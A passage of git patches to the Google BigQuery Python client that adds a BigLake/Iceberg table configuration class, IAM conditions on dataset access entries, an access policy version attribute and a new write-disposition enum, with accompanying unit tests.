"biglakeConfiguration", "clustering_fields": "clustering", "created": "creationTime", "description": "description", @@ -431,6 +432,29 @@ def __init__(self, table_ref, schema=None) -> None: reference = property(_reference_getter) + @property + def biglake_configuration(self): + """google.cloud.bigquery.table.BigLakeConfiguration: Configuration + for managed tables for Apache Iceberg. + + See https://cloud.google.com/bigquery/docs/iceberg-tables for more information. 
+ """ + prop = self._properties.get( + self._PROPERTY_TO_API_FIELD["biglake_configuration"] + ) + if prop is not None: + prop = BigLakeConfiguration.from_api_repr(prop) + return prop + + @biglake_configuration.setter + def biglake_configuration(self, value): + api_repr = value + if value is not None: + api_repr = value.to_api_repr() + self._properties[ + self._PROPERTY_TO_API_FIELD["biglake_configuration"] + ] = api_repr + @property def require_partition_filter(self): """bool: If set to true, queries over the partitioned table require a @@ -3501,6 +3525,132 @@ def to_api_repr(self) -> Dict[str, Any]: return resource +class BigLakeConfiguration(object): + """Configuration for managed tables for Apache Iceberg, formerly + known as BigLake. + + Args: + connection_id (Optional[str]): + The connection specifying the credentials to be used to read and write to external + storage, such as Cloud Storage. The connection_id can have the form + ``{project}.{location}.{connection_id}`` or + ``projects/{project}/locations/{location}/connections/{connection_id}``. + storage_uri (Optional[str]): + The fully qualified location prefix of the external folder where table data is + stored. The '*' wildcard character is not allowed. The URI should be in the + format ``gs://bucket/path_to_table/``. + file_format (Optional[str]): + The file format the table data is stored in. See BigLakeFileFormat for available + values. + table_format (Optional[str]): + The table format the metadata only snapshots are stored in. See BigLakeTableFormat + for available values. + _properties (Optional[dict]): + Private. Used to construct object from API resource. 
+ """ + + def __init__( + self, + connection_id: Optional[str] = None, + storage_uri: Optional[str] = None, + file_format: Optional[str] = None, + table_format: Optional[str] = None, + _properties: Optional[dict] = None, + ) -> None: + if _properties is None: + _properties = {} + self._properties = _properties + if connection_id is not None: + self.connection_id = connection_id + if storage_uri is not None: + self.storage_uri = storage_uri + if file_format is not None: + self.file_format = file_format + if table_format is not None: + self.table_format = table_format + + @property + def connection_id(self) -> Optional[str]: + """str: The connection specifying the credentials to be used to read and write to external + storage, such as Cloud Storage.""" + return self._properties.get("connectionId") + + @connection_id.setter + def connection_id(self, value: Optional[str]): + self._properties["connectionId"] = value + + @property + def storage_uri(self) -> Optional[str]: + """str: The fully qualified location prefix of the external folder where table data is + stored.""" + return self._properties.get("storageUri") + + @storage_uri.setter + def storage_uri(self, value: Optional[str]): + self._properties["storageUri"] = value + + @property + def file_format(self) -> Optional[str]: + """str: The file format the table data is stored in. See BigLakeFileFormat for available + values.""" + return self._properties.get("fileFormat") + + @file_format.setter + def file_format(self, value: Optional[str]): + self._properties["fileFormat"] = value + + @property + def table_format(self) -> Optional[str]: + """str: The table format the metadata only snapshots are stored in. 
See BigLakeTableFormat + for available values.""" + return self._properties.get("tableFormat") + + @table_format.setter + def table_format(self, value: Optional[str]): + self._properties["tableFormat"] = value + + def _key(self): + return tuple(sorted(self._properties.items())) + + def __eq__(self, other): + if not isinstance(other, BigLakeConfiguration): + return NotImplemented + return self._key() == other._key() + + def __ne__(self, other): + return not self == other + + def __hash__(self): + return hash(self._key()) + + def __repr__(self): + key_vals = ["{}={}".format(key, val) for key, val in self._key()] + return "BigLakeConfiguration({})".format(",".join(key_vals)) + + @classmethod + def from_api_repr(cls, resource: Dict[str, Any]) -> "BigLakeConfiguration": + """Factory: construct a BigLakeConfiguration given its API representation. + + Args: + resource: + BigLakeConfiguration representation returned from the API + + Returns: + BigLakeConfiguration parsed from ``resource``. + """ + ref = cls() + ref._properties = resource + return ref + + def to_api_repr(self) -> Dict[str, Any]: + """Construct the API resource representation of this BigLakeConfiguration. + + Returns: + BigLakeConfiguration represented as an API resource. + """ + return copy.deepcopy(self._properties) + + def _item_to_row(iterator, resource): """Convert a JSON row to the native object. 
diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index a9966f1ce..253006547 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -435,6 +435,12 @@ def _make_resource(self): "sourceFormat": "CSV", "csvOptions": {"allowJaggedRows": True, "encoding": "encoding"}, }, + "biglakeConfiguration": { + "connectionId": "connection", + "storageUri": "uri", + "fileFormat": "PARQUET", + "tableFormat": "ICEBERG", + }, "labels": {"x": "y"}, } @@ -521,6 +527,15 @@ def _verifyResourceProperties(self, table, resource): else: self.assertIsNone(table.encryption_configuration) + if "biglakeConfiguration" in resource: + self.assertIsNotNone(table.biglake_configuration) + self.assertEqual(table.biglake_configuration.connection_id, "connection") + self.assertEqual(table.biglake_configuration.storage_uri, "uri") + self.assertEqual(table.biglake_configuration.file_format, "PARQUET") + self.assertEqual(table.biglake_configuration.table_format, "ICEBERG") + else: + self.assertIsNone(table.biglake_configuration) + def test_ctor(self): dataset = DatasetReference(self.PROJECT, self.DS_ID) table_ref = dataset.table(self.TABLE_NAME) @@ -893,6 +908,60 @@ def test_table_constraints_property_getter(self): assert isinstance(table_constraints, TableConstraints) assert table_constraints.primary_key == PrimaryKey(columns=["id"]) + def test_biglake_configuration_not_set(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + assert table.biglake_configuration is None + + def test_biglake_configuration_set(self): + from google.cloud.bigquery.table import BigLakeConfiguration + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + table._properties["biglakeConfiguration"] = { + "connectionId": "connection", + "storageUri": "uri", + "fileFormat": "PARQUET", + "tableFormat": "ICEBERG", + } + + config = 
table.biglake_configuration + + assert isinstance(config, BigLakeConfiguration) + assert config.connection_id == "connection" + assert config.storage_uri == "uri" + assert config.file_format == "PARQUET" + assert config.table_format == "ICEBERG" + + def test_biglake_configuration_property_setter(self): + from google.cloud.bigquery.table import BigLakeConfiguration + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + config = BigLakeConfiguration( + connection_id="connection", + storage_uri="uri", + file_format="PARQUET", + table_format="ICEBERG", + ) + table.biglake_configuration = config + + assert table._properties["biglakeConfiguration"] == { + "connectionId": "connection", + "storageUri": "uri", + "fileFormat": "PARQUET", + "tableFormat": "ICEBERG", + } + + table.biglake_configuration = None + assert table.biglake_configuration is None + def test_table_constraints_property_setter(self): from google.cloud.bigquery.table import ( ColumnReference, @@ -2166,6 +2235,97 @@ def test_ctor_full_resource(self): assert instance.snapshot_time == expected_time +class TestBigLakeConfiguration(unittest.TestCase): + @staticmethod + def _get_target_class(): + from google.cloud.bigquery.table import BigLakeConfiguration + + return BigLakeConfiguration + + @classmethod + def _make_one(cls, *args, **kwargs): + klass = cls._get_target_class() + return klass(*args, **kwargs) + + def test_ctor_empty_resource(self): + instance = self._make_one() + self.assertIsNone(instance.connection_id) + self.assertIsNone(instance.storage_uri) + self.assertIsNone(instance.file_format) + self.assertIsNone(instance.table_format) + + def test_ctor_kwargs(self): + instance = self._make_one( + connection_id="conn", + storage_uri="uri", + file_format="FILE", + table_format="TABLE", + ) + self.assertEqual(instance.connection_id, "conn") + self.assertEqual(instance.storage_uri, "uri") + 
self.assertEqual(instance.file_format, "FILE") + self.assertEqual(instance.table_format, "TABLE") + + def test_ctor_full_resource(self): + resource = { + "connectionId": "conn", + "storageUri": "uri", + "fileFormat": "FILE", + "tableFormat": "TABLE", + } + instance = self._make_one(_properties=resource) + self.assertEqual(instance.connection_id, "conn") + self.assertEqual(instance.storage_uri, "uri") + self.assertEqual(instance.file_format, "FILE") + self.assertEqual(instance.table_format, "TABLE") + + def test_to_api_repr(self): + resource = { + "connectionId": "conn", + "storageUri": "uri", + "fileFormat": "FILE", + "tableFormat": "TABLE", + } + instance = self._make_one(_properties=resource) + self.assertEqual(instance.to_api_repr(), resource) + + def test_from_api_repr_partial(self): + klass = self._get_target_class() + api_repr = {"fileFormat": "FILE"} + instance = klass.from_api_repr(api_repr) + + self.assertIsNone(instance.connection_id) + self.assertIsNone(instance.storage_uri) + self.assertEqual(instance.file_format, "FILE") + self.assertIsNone(instance.table_format) + + def test_comparisons(self): + resource = { + "connectionId": "conn", + "storageUri": "uri", + "fileFormat": "FILE", + "tableFormat": "TABLE", + } + + first = self._make_one(_properties=resource) + second = self._make_one(_properties=copy.deepcopy(resource)) + # Exercise comparator overloads. + # first and second should be equivalent. + self.assertNotEqual(first, resource) + self.assertEqual(first, second) + self.assertEqual(hash(first), hash(second)) + + # Update second to ensure that first and second are no longer equivalent. + second.connection_id = "foo" + self.assertNotEqual(first, second) + self.assertNotEqual(hash(first), hash(second)) + + # Update first with the same change, restoring equivalence. 
+ first.connection_id = "foo" + self.assertEqual(first, second) + self.assertEqual(hash(first), hash(second)) + + class TestCloneDefinition: @staticmethod def _get_target_class(): From 7301667272dfbdd04b1a831418a9ad2d037171fb Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 29 Apr 2025 09:16:36 -0400 Subject: [PATCH 091/202] feat: Update the AccessEntry class with a new condition attribute and unit tests (#2163) * feat: adds condition class and assoc. unit tests * Updates AccessEntry with condition setter/getter * Adds condition attr to AccessEntry and unit tests * adds tests for Condition dunder methods to ensure coverage * moves the entity_type logic out of _from_api_repr to entity_type setter * Updates logic in entity_type getter * updates several AccessEntry related tests * Updates AccessEntry condition setter test to use a dict * updates entity_id handling * Updates _entity_type access * tweaks type hinting * Update tests/unit/test_dataset.py * Update tests/unit/test_dataset.py * Updates DatasetReference in test and __eq__ check * remove debug print statement --- google/cloud/bigquery/dataset.py | 126 ++++++++++-- tests/unit/test_dataset.py | 336 +++++++++++++++++++++++++++++-- 2 files changed, 432 insertions(+), 30 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index cc14598fe..670fe127c 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -298,12 +298,15 @@ def __init__( role: Optional[str] = None, entity_type: Optional[str] = None, entity_id: Optional[Union[Dict[str, Any], str]] = None, + **kwargs, ): - self._properties = {} + self._properties: Dict[str, Any] = {} if entity_type is not None: self._properties[entity_type] = entity_id self._properties["role"] = role - self._entity_type = entity_type + self._entity_type: Optional[str] = entity_type + for prop, val in kwargs.items(): + setattr(self, prop, val) @property def role(self) -> Optional[str]: @@ -330,6 +333,9 @@ 
def dataset(self, value): if isinstance(value, str): value = DatasetReference.from_string(value).to_api_repr() + if isinstance(value, DatasetReference): + value = value.to_api_repr() + if isinstance(value, (Dataset, DatasetListItem)): value = value.reference.to_api_repr() @@ -437,15 +443,65 @@ def special_group(self) -> Optional[str]: def special_group(self, value): self._properties["specialGroup"] = value + @property + def condition(self) -> Optional["Condition"]: + """Optional[Condition]: The IAM condition associated with this entry.""" + value = typing.cast(Dict[str, Any], self._properties.get("condition")) + return Condition.from_api_repr(value) if value else None + + @condition.setter + def condition(self, value: Union["Condition", dict, None]): + """Set the IAM condition for this entry.""" + if value is None: + self._properties["condition"] = None + elif isinstance(value, Condition): + self._properties["condition"] = value.to_api_repr() + elif isinstance(value, dict): + self._properties["condition"] = value + else: + raise TypeError("condition must be a Condition object, dict, or None") + @property def entity_type(self) -> Optional[str]: """The entity_type of the entry.""" + + # The api_repr for an AccessEntry object is expected to be a dict with + # only a few keys. Two keys that may be present are role and condition. + # Any additional key is going to have one of ~eight different names: + # userByEmail, groupByEmail, domain, dataset, specialGroup, view, + # routine, iamMember + + # if self._entity_type is None, see if it needs setting + # i.e. is there a key: value pair that should be associated with + # entity_type and entity_id? + if self._entity_type is None: + resource = self._properties.copy() + # we are emptying the dict to get to the last `key: value` pair + # so we don't keep these first entries + _ = resource.pop("role", None) + _ = resource.pop("condition", None) + + try: + # we only need entity_type, because entity_id gets set elsewhere. 
+ entity_type, _ = resource.popitem() + except KeyError: + entity_type = None + + self._entity_type = entity_type + return self._entity_type @property def entity_id(self) -> Optional[Union[Dict[str, Any], str]]: """The entity_id of the entry.""" - return self._properties.get(self._entity_type) if self._entity_type else None + if self.entity_type: + entity_type = self.entity_type + else: + return None + return typing.cast( + Optional[Union[Dict[str, Any], str]], + self._properties.get(entity_type, None), + ) def __eq__(self, other): if not isinstance(other, AccessEntry): @@ -464,7 +520,16 @@ def _key(self): Returns: Tuple: The contents of this :class:`~google.cloud.bigquery.dataset.AccessEntry`. """ + properties = self._properties.copy() + + # Dicts are not hashable. + # Convert condition to a hashable datatype(s) + condition = properties.get("condition") + if isinstance(condition, dict): + condition_key = tuple(sorted(condition.items())) + properties["condition"] = condition_key + prop_tup = tuple(sorted(properties.items())) return (self.role, self._entity_type, self.entity_id, prop_tup) @@ -491,19 +556,11 @@ def from_api_repr(cls, resource: dict) -> "AccessEntry": Returns: google.cloud.bigquery.dataset.AccessEntry: Access entry parsed from ``resource``. - - Raises: - ValueError: - If the resource has more keys than ``role`` and one additional - key. 
""" - entry = resource.copy() - role = entry.pop("role", None) - entity_type, entity_id = entry.popitem() - if len(entry) != 0: - raise ValueError("Entry has unexpected keys remaining.", entry) - return cls(role, entity_type, entity_id) + access_entry = cls() + access_entry._properties = resource.copy() + return access_entry class Dataset(object): @@ -1160,6 +1217,43 @@ def from_api_repr(cls, resource: Dict[str, Any]) -> "Condition": return cls( expression=resource["expression"], - title=resource.get("title"), - description=resource.get("description"), + title=resource.get("title", None), + description=resource.get("description", None), ) + + def __eq__(self, other: object) -> bool: + """Check for equality based on expression, title, and description.""" + if not isinstance(other, Condition): + return NotImplemented + return self._key() == other._key() + + def _key(self): + """A tuple key that uniquely describes this field. + Used to compute this instance's hashcode and evaluate equality. + Returns: + Tuple: The contents of this :class:`~google.cloud.bigquery.dataset.AccessEntry`. + """ + + properties = self._properties.copy() + + # Dicts are not hashable. 
+ # Convert object to a hashable datatype(s) + prop_tup = tuple(sorted(properties.items())) + return prop_tup + + def __ne__(self, other: object) -> bool: + """Check for inequality.""" + return not self == other + + def __hash__(self) -> int: + """Generate a hash based on expression, title, and description.""" + return hash(self._key()) + + def __repr__(self) -> str: + """Return a string representation of the Condition object.""" + parts = [f"expression={self.expression!r}"] + if self.title is not None: + parts.append(f"title={self.title!r}") + if self.description is not None: + parts.append(f"description={self.description!r}") + return f"Condition({', '.join(parts)})" diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 036e22458..51f1809bf 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -167,7 +167,10 @@ def test_from_api_repr_wo_role(self): entity_type="view", entity_id=resource["view"], ) - self.assertEqual(entry, exp_entry) + + assert entry.entity_type == exp_entry.entity_type + assert entry.entity_id == exp_entry.entity_id + assert entry.role is None def test_to_api_repr_w_extra_properties(self): resource = { @@ -179,15 +182,6 @@ def test_to_api_repr_w_extra_properties(self): exp_resource = entry.to_api_repr() self.assertEqual(resource, exp_resource) - def test_from_api_repr_entries_w_extra_keys(self): - resource = { - "role": "READER", - "specialGroup": "projectReaders", - "userByEmail": "salmon@example.com", - } - with self.assertRaises(ValueError): - self._get_target_class().from_api_repr(resource) - def test_view_getter_setter(self): view = { "projectId": "my_project", @@ -307,7 +301,10 @@ def test_dataset_getter_setter_dataset_ref(self): entry.dataset = dataset_ref resource = entry.to_api_repr() exp_resource = { - "dataset": {"dataset": dataset_ref, "targetTypes": None}, + "dataset": { + "dataset": {"datasetId": "my_dataset", "projectId": "my-project"}, + "targetTypes": None, + }, "role": None, } 
self.assertEqual(resource, exp_resource) @@ -494,6 +491,262 @@ def test_dataset_target_types_getter_setter_w_dataset(self): self.assertEqual(entry.dataset_target_types, target_types) +# --- Tests for AccessEntry when using Condition --- + +EXPRESSION = "request.time < timestamp('2026-01-01T00:00:00Z')" +TITLE = "Expires end 2025" +DESCRIPTION = "Access expires at the start of 2026." + + +@pytest.fixture +def condition_1(): + """Provides a sample Condition object.""" + return Condition( + expression=EXPRESSION, + title=TITLE, + description=DESCRIPTION, + ) + + +@pytest.fixture +def condition_1_api_repr(): + """Provides the API representation for condition_1.""" + # Use the actual to_api_repr method + return Condition( + expression=EXPRESSION, + title=TITLE, + description=DESCRIPTION, + ).to_api_repr() + + +@pytest.fixture +def condition_2(): + """Provides a second, different Condition object.""" + return Condition( + expression="resource.name.startsWith('projects/_/buckets/restricted/')", + title="Restricted Buckets", + ) + + +@pytest.fixture +def condition_2_api_repr(): + """Provides the API representation for condition2.""" + # Use the actual to_api_repr method + return Condition( + expression="resource.name.startsWith('projects/_/buckets/restricted/')", + title="Restricted Buckets", + ).to_api_repr() + + +class TestAccessEntryAndCondition: + @staticmethod + def _get_target_class(): + return AccessEntry + + def _make_one(self, *args, **kw): + return self._get_target_class()(*args, **kw) + + # Test __init__ without condition + def test_init_without_condition(self): + entry = AccessEntry("READER", "userByEmail", "test@example.com") + assert entry.role == "READER" + assert entry.entity_type == "userByEmail" + assert entry.entity_id == "test@example.com" + assert entry.condition is None + # Accessing _properties is for internal verification in tests + assert "condition" not in entry._properties + + # Test __init__ with condition object + def 
test_init_with_condition_object(self, condition_1, condition_1_api_repr): + entry = AccessEntry( + "READER", "userByEmail", "test@example.com", condition=condition_1 + ) + assert entry.condition == condition_1 + assert entry._properties.get("condition") == condition_1_api_repr + + # Test __init__ with condition=None + def test_init_with_condition_none(self): + entry = AccessEntry("READER", "userByEmail", "test@example.com", condition=None) + assert entry.condition is None + + # Test condition getter/setter + def test_condition_getter_setter( + self, condition_1, condition_1_api_repr, condition_2, condition_2_api_repr + ): + entry = AccessEntry("WRITER", "group", "admins@example.com") + assert entry.condition is None + + # Set condition 1 + entry.condition = condition_1 + assert entry.condition.to_api_repr() == condition_1_api_repr + assert entry._properties.get("condition") == condition_1_api_repr + + # Set condition 2 + entry.condition = condition_2 + assert entry.condition.to_api_repr() == condition_2_api_repr + assert entry._properties.get("condition") != condition_1_api_repr + assert entry._properties.get("condition") == condition_2.to_api_repr() + + # Set back to None + entry.condition = None + assert entry.condition is None + + # Set condition using a dict + entry.condition = condition_1_api_repr + assert entry._properties.get("condition") == condition_1_api_repr + + # Test setter validation + def test_condition_setter_invalid_type(self): + entry = AccessEntry("READER", "domain", "example.com") + with pytest.raises( + TypeError, match="condition must be a Condition object, dict, or None" + ): + entry.condition = 123 # type: ignore + + # Test equality/hash without condition + def test_equality_and_hash_without_condition(self): + entry1 = AccessEntry("OWNER", "specialGroup", "projectOwners") + entry2 = AccessEntry("OWNER", "specialGroup", "projectOwners") + entry3 = AccessEntry("WRITER", "specialGroup", "projectOwners") + assert entry1 == entry2 + assert entry1 
!= entry3 + assert hash(entry1) == hash(entry2) + assert hash(entry1) != hash(entry3) # Usually true + + def test_equality_and_hash_with_condition(self, condition_1, condition_2): + cond1a = Condition( + condition_1.expression, condition_1.title, condition_1.description + ) + cond1b = Condition( + condition_1.expression, condition_1.title, condition_1.description + ) # Same values, different object + + entry1a = AccessEntry( + "READER", "userByEmail", "a@example.com", condition=cond1a + ) + entry1b = AccessEntry( + "READER", "userByEmail", "a@example.com", condition=cond1b + ) # Different Condition instance + entry2 = AccessEntry( + "READER", "userByEmail", "a@example.com", condition=condition_2 + ) + entry3 = AccessEntry("READER", "userByEmail", "a@example.com") # No condition + entry4 = AccessEntry( + "WRITER", "userByEmail", "a@example.com", condition=cond1a + ) # Different role + + assert entry1a == entry1b + assert entry1a != entry2 + assert entry1a != entry3 + assert entry1a != entry4 + assert entry2 != entry3 + + assert hash(entry1a) == hash(entry1b) + assert hash(entry1a) != hash(entry2) # Usually true + assert hash(entry1a) != hash(entry3) # Usually true + assert hash(entry1a) != hash(entry4) # Usually true + + # Test to_api_repr with condition + def test_to_api_repr_with_condition(self, condition_1, condition_1_api_repr): + entry = AccessEntry( + "WRITER", "groupByEmail", "editors@example.com", condition=condition_1 + ) + expected_repr = { + "role": "WRITER", + "groupByEmail": "editors@example.com", + "condition": condition_1_api_repr, + } + assert entry.to_api_repr() == expected_repr + + def test_view_property_with_condition(self, condition_1): + """Test setting/getting view property when condition is present.""" + entry = AccessEntry(role=None, entity_type="view", condition=condition_1) + view_ref = TableReference(DatasetReference("proj", "dset"), "view_tbl") + entry.view = view_ref # Use the setter + assert entry.view == view_ref + assert 
entry.condition == condition_1 # Condition should persist + assert entry.role is None + assert entry.entity_type == "view" + + # Check internal representation + assert "view" in entry._properties + assert "condition" in entry._properties + + def test_user_by_email_property_with_condition(self, condition_1): + """Test setting/getting user_by_email property when condition is present.""" + entry = AccessEntry( + role="READER", entity_type="userByEmail", condition=condition_1 + ) + email = "test@example.com" + entry.user_by_email = email # Use the setter + assert entry.user_by_email == email + assert entry.condition == condition_1 # Condition should persist + assert entry.role == "READER" + assert entry.entity_type == "userByEmail" + + # Check internal representation + assert "userByEmail" in entry._properties + assert "condition" in entry._properties + + # Test from_api_repr without condition + def test_from_api_repr_without_condition(self): + api_repr = {"role": "OWNER", "userByEmail": "owner@example.com"} + entry = AccessEntry.from_api_repr(api_repr) + assert entry.role == "OWNER" + assert entry.entity_type == "userByEmail" + assert entry.entity_id == "owner@example.com" + assert entry.condition is None + + # Test from_api_repr with condition + def test_from_api_repr_with_condition(self, condition_1, condition_1_api_repr): + api_repr = { + "role": "READER", + "view": {"projectId": "p", "datasetId": "d", "tableId": "v"}, + "condition": condition_1_api_repr, + } + entry = AccessEntry.from_api_repr(api_repr) + assert entry.role == "READER" + assert entry.entity_type == "view" + # The entity_id for view/routine/dataset is the dict itself + assert entry.entity_id == {"projectId": "p", "datasetId": "d", "tableId": "v"} + assert entry.condition == condition_1 + + # Test from_api_repr edge case + def test_from_api_repr_no_entity(self, condition_1, condition_1_api_repr): + api_repr = {"role": "READER", "condition": condition_1_api_repr} + entry = 
AccessEntry.from_api_repr(api_repr) + assert entry.role == "READER" + assert entry.entity_type is None + assert entry.entity_id is None + assert entry.condition == condition_1 + + def test_dataset_property_with_condition(self, condition_1): + project = "my-project" + dataset_id = "my_dataset" + dataset_ref = DatasetReference(project, dataset_id) + entry = self._make_one(None) + entry.dataset = dataset_ref + entry.condition = condition_1 + + resource = entry.to_api_repr() + exp_resource = { + "role": None, + "dataset": { + "dataset": {"datasetId": "my_dataset", "projectId": "my-project"}, + "targetTypes": None, + }, + "condition": { + "expression": "request.time < timestamp('2026-01-01T00:00:00Z')", + "title": "Expires end 2025", + "description": "Access expires at the start of 2026.", + }, + } + assert resource == exp_resource + # Check internal representation + assert "dataset" in entry._properties + assert "condition" in entry._properties + + class TestDatasetReference(unittest.TestCase): @staticmethod def _get_target_class(): @@ -821,7 +1074,15 @@ def test_ctor_explicit(self): self.assertEqual( dataset.path, "/projects/%s/datasets/%s" % (OTHER_PROJECT, self.DS_ID) ) - self.assertEqual(dataset.access_entries, entries) + # creating a list of entries relies on AccessEntry.from_api_repr + # which does not create an object in exactly the same way as calling the + # class directly. We rely on calls to .entity_type and .entity_id to + # finalize the settings on each class. 
+ entry_pairs = zip(dataset.access_entries, entries) + for pair in entry_pairs: + assert pair[0].role == pair[1].role + assert pair[0].entity_type == pair[1].entity_type + assert pair[0].entity_id == pair[1].entity_id self.assertIsNone(dataset.created) self.assertIsNone(dataset.full_dataset_id) @@ -854,8 +1115,18 @@ def test_access_entries_setter(self): dataset = self._make_one(self.DS_REF) phred = AccessEntry("OWNER", "userByEmail", "phred@example.com") bharney = AccessEntry("OWNER", "userByEmail", "bharney@example.com") - dataset.access_entries = [phred, bharney] - self.assertEqual(dataset.access_entries, [phred, bharney]) + entries = [phred, bharney] + dataset.access_entries = entries + + # creating a list of entries relies on AccessEntry.from_api_repr + # which does not create an object in exactly the same way as calling the + # class directly. We rely on calls to .entity_type and .entity_id to + # finalize the settings on each class. + entry_pairs = zip(dataset.access_entries, entries) + for pair in entry_pairs: + assert pair[0].role == pair[1].role + assert pair[0].entity_type == pair[1].entity_type + assert pair[0].entity_id == pair[1].entity_id def test_default_partition_expiration_ms(self): dataset = self._make_one("proj.dset") @@ -1383,3 +1654,40 @@ def test_validation_expression_required_from_api(self): ValueError, match="API representation missing required 'expression' field." 
): Condition.from_api_repr(api_repr) + + def test___eq___equality(self, condition_1): + result = condition_1 + expected = condition_1 + assert result == expected + + def test___eq___equality_not_condition(self, condition_1): + result = condition_1 + other = "not a condition" + expected = result.__eq__(other) + assert expected is NotImplemented + + def test__ne__not_equality(self): + result = condition_1 + expected = condition_2 + assert result != expected + + def test__hash__function(self, condition_2): + cond1 = Condition( + expression=self.EXPRESSION, title=self.TITLE, description=self.DESCRIPTION + ) + cond2 = cond1 + cond_not_equal = condition_2 + assert cond1 == cond2 + assert cond1 is cond2 + assert hash(cond1) == hash(cond2) + assert hash(cond1) is not None + assert cond_not_equal != cond1 + assert hash(cond_not_equal) != hash(cond1) + + def test__hash__with_minimal_inputs(self): + cond1 = Condition( + expression="example", + title=None, + description=None, + ) + assert hash(cond1) is not None From b7656b97c1bd6c204d0508b1851d114719686655 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 1 May 2025 17:20:21 -0400 Subject: [PATCH 092/202] feat: add dataset access policy version attribute (#2169) * feat: adds condition class and assoc. 
unit tests * Updates two test cases for empty string * Updates tests for clarity * Updates access_policy_version setter and unittest --- google/cloud/bigquery/dataset.py | 15 +++++++++++++-- tests/unit/test_dataset.py | 30 ++++++++++++++++++++++++++++++ 2 files changed, 43 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index 670fe127c..d225b7106 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -589,6 +589,7 @@ class Dataset(object): "default_rounding_mode": "defaultRoundingMode", "resource_tags": "resourceTags", "external_catalog_dataset_options": "externalCatalogDatasetOptions", + "access_policy_version": "accessPolicyVersion", } def __init__(self, dataset_ref) -> None: @@ -979,6 +980,16 @@ def external_catalog_dataset_options(self, value): self._PROPERTY_TO_API_FIELD["external_catalog_dataset_options"] ] = (value.to_api_repr() if value is not None else None) + @property + def access_policy_version(self): + return self._properties.get("accessPolicyVersion") + + @access_policy_version.setter + def access_policy_version(self, value): + if not isinstance(value, int) and value is not None: + raise ValueError("Pass an integer, or None") + self._properties["accessPolicyVersion"] = value + @classmethod def from_string(cls, full_dataset_id: str) -> "Dataset": """Construct a dataset from fully-qualified dataset ID. 
@@ -1217,8 +1228,8 @@ def from_api_repr(cls, resource: Dict[str, Any]) -> "Condition": return cls( expression=resource["expression"], - title=resource.get("title", None), - description=resource.get("description", None), + title=resource.get("title"), + description=resource.get("description"), ) def __eq__(self, other: object) -> bool: diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 51f1809bf..941430827 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -1049,6 +1049,7 @@ def test_ctor_defaults(self): self.assertIsNone(dataset.friendly_name) self.assertIsNone(dataset.location) self.assertEqual(dataset.is_case_insensitive, False) + self.assertIsNone(dataset.access_policy_version) def test_ctor_string(self): dataset = self._make_one("some-project.some_dset") @@ -1423,6 +1424,35 @@ def test_external_catalog_dataset_options_to_api_repr(self): expected = api_repr["externalCatalogDatasetOptions"] assert result == expected + def test_access_policy_version_valid_input(self): + dataset = self._make_one(self.DS_REF) + # Valid inputs for access_policy_version are currently + # ints 1, 2, 3, and None + # We rely upon the BQ backend to validate acceptable integer + # values, rather than perform that validation in the client. 
+ for expected in [1, 2, 3, None]: + # set property using setter and integer + dataset.access_policy_version = expected + + # check getter and _properties dict + assert ( + dataset.access_policy_version == expected + ), f"Expected {expected} but got {dataset.access_policy_version}" + assert dataset._properties["accessPolicyVersion"] == expected + + def test_access_policy_version_invalid_input(self): + dataset = self._make_one(self.DS_REF) + # Valid inputs for access_policy_version are currently + # ints 1, 2, 3, and None + + with pytest.raises(ValueError): + invalid_value = "a string" + dataset.access_policy_version = invalid_value + + with pytest.raises(ValueError): + invalid_value = 42.0 + dataset.access_policy_version = invalid_value + class TestDatasetListItem(unittest.TestCase): @staticmethod From 46927479085f13fd326e3f2388f60dfdd37f7f69 Mon Sep 17 00:00:00 2001 From: shollyman Date: Thu, 1 May 2025 14:52:26 -0700 Subject: [PATCH 093/202] feat: add WRITE_TRUNCATE_DATA enum (#2166) This PR documents the new WRITE_TRUNCATE_DATA write disposition by adding the enum value. 
internal issue: b/406848221 --- google/cloud/bigquery/enums.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index b32fc8200..203ea3c7b 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -338,6 +338,10 @@ class WriteDisposition(object): WRITE_TRUNCATE = "WRITE_TRUNCATE" """If the table already exists, BigQuery overwrites the table data.""" + WRITE_TRUNCATE_DATA = "WRITE_TRUNCATE_DATA" + """For existing tables, truncate data but preserve existing schema + and constraints.""" + WRITE_EMPTY = "WRITE_EMPTY" """If the table already exists and contains data, a 'duplicate' error is returned in the job result.""" From 5c8e9179923d914745eaa98fc52a9d8577fe2484 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 12 May 2025 18:34:55 +0200 Subject: [PATCH 094/202] chore(deps): update all dependencies (#2158) * chore(deps): update all dependencies * Update samples/geography/requirements.txt --------- Co-authored-by: Chalmer Lowe --- samples/desktopapp/requirements-test.txt | 2 +- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 25 ++++++++++++------------ samples/magics/requirements-test.txt | 2 +- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements-test.txt | 2 +- samples/notebooks/requirements.txt | 6 +++--- samples/snippets/requirements-test.txt | 2 +- 8 files changed, 22 insertions(+), 21 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 183230cf4..6abea3b4d 100644 --- 